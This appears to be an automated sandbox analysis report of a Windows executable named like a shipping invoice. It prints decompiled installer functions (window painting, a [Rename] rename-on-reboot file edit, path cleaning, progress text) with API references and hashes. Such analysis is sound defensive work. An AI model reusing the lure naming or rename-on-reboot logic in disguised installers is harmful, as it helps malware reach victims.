                                                                                                                                    0x00401061
                                                                                                                                    0x00401064
                                                                                                                                    0x004010f3
                                                                                                                                    0x00401089
                                                                                                                                    0x0040108c
                                                                                                                                    0x004010a6
                                                                                                                                    0x004010bd
                                                                                                                                    0x004010cc
                                                                                                                                    0x004010cf
                                                                                                                                    0x004010d5
                                                                                                                                    0x004010d9
                                                                                                                                    0x004010e4
                                                                                                                                    0x004010ed
                                                                                                                                    0x004010ef
                                                                                                                                    0x004010ef
                                                                                                                                    0x00401100
                                                                                                                                    0x00401105
                                                                                                                                    0x0040110d
                                                                                                                                    0x00401110
                                                                                                                                    0x00401112
                                                                                                                                    0x00401118
                                                                                                                                    0x0040111f
                                                                                                                                    0x00401126
                                                                                                                                    0x00401130
                                                                                                                                    0x00401142
                                                                                                                                    0x00401156
                                                                                                                                    0x00401160
                                                                                                                                    0x00401165
                                                                                                                                    0x00401165
                                                                                                                                    0x00401110
                                                                                                                                    0x0040116e
                                                                                                                                    0x00000000
                                                                                                                                    0x00401178
                                                                                                                                    0x00401010
                                                                                                                                    0x00401013
                                                                                                                                    0x00401015
                                                                                                                                    0x0040101f
                                                                                                                                    0x0040101f
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                    • DrawTextA.USER32(00000000,Unbound Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                    • String ID: F$Unbound Setup
                                                                                                                                    • API String ID: 941294808-863422241
                                                                                                                                    • Opcode ID: 5dfc0a365ae6646cd7cf79038b101edce8fbc994cd9983f08dbb808245b03f20
                                                                                                                                    • Instruction ID: b542f919fab398636142f3c5daf315cc403a9a3a4e76b50810c965540b20923a
                                                                                                                                    • Opcode Fuzzy Hash: 5dfc0a365ae6646cd7cf79038b101edce8fbc994cd9983f08dbb808245b03f20
                                                                                                                                    • Instruction Fuzzy Hash: 1D418C71400209AFCB058FA5DE459BFBBB9FF44314F00842EF5A1AA1A0CB74A955DFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405DD5, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405DD5(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c628 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c228, "%s=%s\r\n", 0x42c628, 0x42ca28);
						_t53 = _t52 + 0x10;
						E00406188(_t37, 0x400, 0x42ca28, 0x42ca28,  *((intOrPtr*)( *0x42f434 + 0x128)));
						_t12 = E00405CFF(0x42ca28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405D77(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405C64(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405C64(_t38, _t21 + 0xa, 0x40a3d0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405CBA(_t24 + _t46, 0x42c228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405DA6(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405CFF(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                    0x00405dd5
                                                                                                                                    0x00405dde
                                                                                                                                    0x00405de5
                                                                                                                                    0x00405df9
                                                                                                                                    0x00405e21
                                                                                                                                    0x00405e2c
                                                                                                                                    0x00405e30
                                                                                                                                    0x00405e50
                                                                                                                                    0x00405e57
                                                                                                                                    0x00405e61
                                                                                                                                    0x00405e6e
                                                                                                                                    0x00405e73
                                                                                                                                    0x00405e78
                                                                                                                                    0x00405e7c
                                                                                                                                    0x00405e8b
                                                                                                                                    0x00405e8d
                                                                                                                                    0x00405e9a
                                                                                                                                    0x00405e9e
                                                                                                                                    0x00405f39
                                                                                                                                    0x00000000
                                                                                                                                    0x00405eb4
                                                                                                                                    0x00405ec1
                                                                                                                                    0x00405ee5
                                                                                                                                    0x00405ee9
                                                                                                                                    0x00405f08
                                                                                                                                    0x00405f0c
                                                                                                                                    0x00405f0c
                                                                                                                                    0x00405f0e
                                                                                                                                    0x00405f17
                                                                                                                                    0x00405f22
                                                                                                                                    0x00405f2d
                                                                                                                                    0x00405f33
                                                                                                                                    0x00000000
                                                                                                                                    0x00405f33
                                                                                                                                    0x00405eeb
                                                                                                                                    0x00405eee
                                                                                                                                    0x00405ef9
                                                                                                                                    0x00405ef5
                                                                                                                                    0x00405ef7
                                                                                                                                    0x00405ef8
                                                                                                                                    0x00405ef8
                                                                                                                                    0x00405f00
                                                                                                                                    0x00405f02
                                                                                                                                    0x00000000
                                                                                                                                    0x00405f02
                                                                                                                                    0x00405ecc
                                                                                                                                    0x00405ed2
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ed2
                                                                                                                                    0x00405e9e
                                                                                                                                    0x00405e7c
                                                                                                                                    0x00405dfb
                                                                                                                                    0x00405e06
                                                                                                                                    0x00405e0f
                                                                                                                                    0x00405e13
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e13
                                                                                                                                    0x00405f44

                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F66,?,?), ref: 00405E06
                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042C628,00000400), ref: 00405E0F
                                                                                                                                      • Part of subcall function 00405C64: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C74
                                                                                                                                      • Part of subcall function 00405C64: lstrlenA.KERNEL32(00000000,?,00000000,00405EBF,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA6
                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA28,00000400), ref: 00405E2C
                                                                                                                                    • wsprintfA.USER32 ref: 00405E4A
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA28,C0000000,00000004,0042CA28,?,?,?,?,?), ref: 00405E85
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E94
                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ECC
                                                                                                                                    • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042C228,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405F22
                                                                                                                                    • GlobalFree.KERNEL32 ref: 00405F33
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F3A
                                                                                                                                      • Part of subcall function 00405CFF: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                      • Part of subcall function 00405CFF: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                                                    • Opcode ID: 2c940d09fa256aeebfe4a19b4703d07082a790d8a2d92a4b592a3db9a957e8a2
                                                                                                                                    • Instruction ID: 05b6362dc2488e262faedbf79d328ada9dd6fef7860b966caa5704833f821d8d
                                                                                                                                    • Opcode Fuzzy Hash: 2c940d09fa256aeebfe4a19b4703d07082a790d8a2d92a4b592a3db9a957e8a2
                                                                                                                                    • Instruction Fuzzy Hash: 03311231604B16ABD2206B65AD89F6B3A5CDF45754F14043AFA41FA2C2DE7CE8018FBD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004063D0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004063D0(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405B6B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405B29("*?|<>/\":", _t5))) == 0) {
							E00405CBA(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                    0x004063d2
                                                                                                                                    0x004063da
                                                                                                                                    0x004063ee
                                                                                                                                    0x004063ee
                                                                                                                                    0x004063f4
                                                                                                                                    0x00406401
                                                                                                                                    0x00406401
                                                                                                                                    0x00406402
                                                                                                                                    0x00406404
                                                                                                                                    0x00406408
                                                                                                                                    0x0040640a
                                                                                                                                    0x00406413
                                                                                                                                    0x00406415
                                                                                                                                    0x0040642f
                                                                                                                                    0x00406437
                                                                                                                                    0x00406437
                                                                                                                                    0x0040643c
                                                                                                                                    0x0040643e
                                                                                                                                    0x00406440
                                                                                                                                    0x00406444
                                                                                                                                    0x00406445
                                                                                                                                    0x00406448
                                                                                                                                    0x00406450
                                                                                                                                    0x00406452
                                                                                                                                    0x00406456
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040645c
                                                                                                                                    0x00406461
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406461
                                                                                                                                    0x00406466

                                                                                                                                    APIs
                                                                                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 00406428
                                                                                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406435
                                                                                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040643A
                                                                                                                                    • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403384,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 0040644A
                                                                                                                                    Strings
                                                                                                                                    • *?|<>/":, xrefs: 00406418
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D1
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 0040640C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 589700163-3931316373
                                                                                                                                    • Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                                                                                                    • Instruction ID: 0715c2fc3524d0a0446df48179311655e74bc707a7934f7eacdad72b1a400285
                                                                                                                                    • Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                                                                                                    • Instruction Fuzzy Hash: BB1134218047A029FB3207391C44B777F988B56760F59407FE8C2722C2DA7C5C6292AD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040425B, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                    0x0040426d
                                                                                                                                    0x00404323
                                                                                                                                    0x00000000
                                                                                                                                    0x00404323
                                                                                                                                    0x0040427e
                                                                                                                                    0x00404282
                                                                                                                                    0x00000000
                                                                                                                                    0x0040429c
                                                                                                                                    0x0040429c
                                                                                                                                    0x004042a5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004042a7
                                                                                                                                    0x004042b3
                                                                                                                                    0x004042b6
                                                                                                                                    0x004042b6
                                                                                                                                    0x004042bc
                                                                                                                                    0x004042c2
                                                                                                                                    0x004042c2
                                                                                                                                    0x004042ce
                                                                                                                                    0x004042d4
                                                                                                                                    0x004042db
                                                                                                                                    0x004042de
                                                                                                                                    0x004042e1
                                                                                                                                    0x004042e3
                                                                                                                                    0x004042e3
                                                                                                                                    0x004042eb
                                                                                                                                    0x004042f1
                                                                                                                                    0x004042f1
                                                                                                                                    0x004042fb
                                                                                                                                    0x00404300
                                                                                                                                    0x00404303
                                                                                                                                    0x00404308
                                                                                                                                    0x0040430b
                                                                                                                                    0x0040430b
                                                                                                                                    0x0040431b
                                                                                                                                    0x0040431b
                                                                                                                                    0x00000000
                                                                                                                                    0x0040431e

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                    • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                                                                                    • Instruction ID: 7b33ae707daf7c02fc8d9fa6ba248adc9fc5061c8cf9f9172a3d741643b49688
                                                                                                                                    • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                                                                                    • Instruction Fuzzy Hash: E02167716007049BCB309F78DA48B5B7BF4AF81715B04893EEED6A26E0C738D544CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040528D, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040528D(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00406188(0, _t39, 0x42a078, 0x42a078, _a4);
					}
					_t26 = lstrlenA(0x42a078);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a078);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a078;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a078)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a078, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                                    0x00405293
                                                                                                                                    0x0040529f
                                                                                                                                    0x004052a2
                                                                                                                                    0x004052a8
                                                                                                                                    0x004052b4
                                                                                                                                    0x004052b7
                                                                                                                                    0x004052ba
                                                                                                                                    0x004052c0
                                                                                                                                    0x004052c0
                                                                                                                                    0x004052c6
                                                                                                                                    0x004052ce
                                                                                                                                    0x004052d1
                                                                                                                                    0x004052ee
                                                                                                                                    0x004052f2
                                                                                                                                    0x004052fb
                                                                                                                                    0x004052fb
                                                                                                                                    0x00405305
                                                                                                                                    0x0040530e
                                                                                                                                    0x0040531a
                                                                                                                                    0x00405321
                                                                                                                                    0x00405325
                                                                                                                                    0x00405328
                                                                                                                                    0x0040533b
                                                                                                                                    0x00405349
                                                                                                                                    0x00405349
                                                                                                                                    0x0040534d
                                                                                                                                    0x0040534f
                                                                                                                                    0x00405352
                                                                                                                                    0x00000000
                                                                                                                                    0x00405352
                                                                                                                                    0x004052d3
                                                                                                                                    0x004052db
                                                                                                                                    0x004052e3
                                                                                                                                    0x004052e9
                                                                                                                                    0x00000000
                                                                                                                                    0x004052e9
                                                                                                                                    0x004052e3
                                                                                                                                    0x004052d1
                                                                                                                                    0x0040535c

                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                    • lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                    • lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                    • SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                    • Opcode ID: 38a218fa60d47ea0260b94fbc4af4e961fd8fac88371a7bd04fe7cbbd1b79051
                                                                                                                                    • Instruction ID: a52ee3f547af6adcee90036766ee5b5c0f447e9b7981664ca9c41ebf49496833
                                                                                                                                    • Opcode Fuzzy Hash: 38a218fa60d47ea0260b94fbc4af4e961fd8fac88371a7bd04fe7cbbd1b79051
                                                                                                                                    • Instruction Fuzzy Hash: 5721AE31900508BFDF019FA5CD8499EBFB9EF05354F14807AF904B6291C6798A848F98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00402D75, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00402D75(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42944c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42944c = 0;
					return _t15;
				}
				__eflags =  *0x42944c; // 0x0
				if(__eflags != 0) {
					return E0040653A(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42f430;
				if(_t6 >  *0x42f430) {
					__eflags =  *0x42f428;
					if( *0x42f428 == 0) {
						_t7 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402CDD, 0);
						 *0x42944c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42f4f4 & 0x00000001;
					if(( *0x42f4f4 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402D59());
						return E0040528D(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                                    0x00402d81
                                                                                                                                    0x00402d83
                                                                                                                                    0x00402d8a
                                                                                                                                    0x00402d8d
                                                                                                                                    0x00402d8d
                                                                                                                                    0x00402d93
                                                                                                                                    0x00000000
                                                                                                                                    0x00402d93
                                                                                                                                    0x00402d9b
                                                                                                                                    0x00402da1
                                                                                                                                    0x00000000
                                                                                                                                    0x00402da4
                                                                                                                                    0x00402dab
                                                                                                                                    0x00402db1
                                                                                                                                    0x00402db7
                                                                                                                                    0x00402db9
                                                                                                                                    0x00402dbf
                                                                                                                                    0x00402dfd
                                                                                                                                    0x00402e06
                                                                                                                                    0x00000000
                                                                                                                                    0x00402e0b
                                                                                                                                    0x00402dc1
                                                                                                                                    0x00402dc8
                                                                                                                                    0x00402dd9
                                                                                                                                    0x00000000
                                                                                                                                    0x00402de7
                                                                                                                                    0x00402dc8
                                                                                                                                    0x00402e13

                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402D8D
